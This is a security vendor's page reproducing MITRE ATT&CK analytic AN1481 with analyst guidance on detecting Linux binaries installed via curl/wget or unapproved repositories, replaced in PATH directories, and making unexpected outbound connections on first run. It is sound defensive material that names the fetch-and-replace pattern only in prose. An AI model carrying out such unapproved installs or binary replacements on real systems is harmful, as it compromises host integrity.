Live Active security incident? Get immediate response
MITRE ATT&CK® Analytic

AN1481: Analytic 1481

1) Package manager or curl/wget installs/upgrades from non-approved repos or unsigned packages; 2) new ELF written into PATH directories or replacement of existing binaries/libraries; 3) first run leads to unexpected child processes or outbound connections.

EnterpriseAN1481AnalyticObject v1.0 Modified
Discuss defensive coverage Back to ATT&CK
Glexia's Take

Analyst context for executives and security teams

Analyst confidence Medium

This analytic is relevant to Linux software supply-chain and host integrity risk: it focuses on signs that software was installed or changed outside approved channels, that executable files appeared in trusted PATH locations, and that the first execution behaved unexpectedly. For leaders, the value is not just malware detection; it is validating whether Linux change control, package trust, and endpoint telemetry can prove that critical systems are running approved code.

Executive priority

Prioritize this where Linux systems support production services, privileged administration, regulated workloads, or incident-response evidence requirements. The business question is whether the organization can distinguish approved software maintenance from unauthorized binary or library replacement quickly enough to protect service continuity and support audit or investigation needs. This also helps guide investment in Linux endpoint visibility, repository governance, and change-control evidence.

Technical view

SOC and detection teams should validate coverage for Linux events involving package managers, curl/wget-based downloads, unsigned or non-approved repository sources, file creation or replacement in PATH directories, ELF file writes, binary/library replacement, first execution behavior, child process creation, and outbound network connections after first run. Because no ATT&CK tactic or official detection logic is supplied, this should be treated as a detection analytic concept that requires local tuning against approved repositories, maintenance tooling, golden images, and expected administrative workflows.

Likely telemetry

  • Linux package manager logs and repository configuration state
  • Process execution telemetry for package managers, curl, wget, newly written ELF files, and first-run activity
  • File creation, modification, and replacement events in PATH directories and library locations
  • File metadata or integrity data that can identify ELF binaries and changed executables/libraries
  • Network connection telemetry from Linux hosts, especially outbound connections following first execution

Detection direction

  • Build allowlists or policy baselines for approved Linux repositories, signed packages, and sanctioned software deployment methods.
  • Correlate non-approved or unsigned install activity with creation or replacement of ELF files in PATH directories and subsequent first-run behavior.
  • Tune out expected administrative maintenance, build pipelines, and configuration management activity to reduce false positives.
  • Pay special attention to sequences where a new or replaced executable starts unexpected child processes or initiates outbound connections.
  • Validate whether endpoint telemetry can reliably observe file writes, process ancestry, and network connections on Linux; missing any one of these weakens the analytic.

Mitigation priorities

  • Define and enforce approved Linux package repositories and package signing expectations.
  • Limit ad hoc software retrieval through curl/wget on managed servers where operationally feasible.
  • Protect trusted executable and library paths with least privilege, file integrity monitoring, and controlled administrative workflows.
  • Maintain software inventory and change-control evidence so suspicious installs can be compared against approved activity.
  • Ensure incident responders can quickly collect package logs, process history, file metadata, and network evidence from affected Linux hosts.
Analyst notes and limits

The supplied ATT&CK object is a detection analytic for Linux, not a technique description. Its practical strength is correlation: suspicious install source, executable or library change in trusted locations, and unexpected behavior on first execution. Glexia would use this to assess Linux monitoring maturity, repository governance, and IR evidence readiness rather than to infer a specific adversary or campaign.

Official detection text, tactics, relationships, aliases, and labels were not provided. No active exploitation, attribution, impact, or guaranteed detection coverage can be inferred. Effective use depends on local definitions of approved repositories, expected maintenance behavior, PATH locations, logging depth, and endpoint/network telemetry retention.

Official MITRE ATT&CK definition

Analytic 1481

1) Package manager or curl/wget installs/upgrades from non-approved repos or unsigned packages; 2) new ELF written into PATH directories or replacement of existing binaries/libraries; 3) first run leads to unexpected child processes or outbound connections.

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

Relationship explorer

All related ATT&CK context

No relationships are available in the current normalized data for this object.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release
19.1
Object version
1.0
Created
Modified
Raw hash
276c11d15f1858a3...
Imported snapshots across ATT&CK releases (1)
Release Bundle imported Object version Modified Status Raw hash
19.1 1.0 Current bundle 276c11d15f18…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy
Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1]
    mitre-attack AN1481
    Open source URL
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use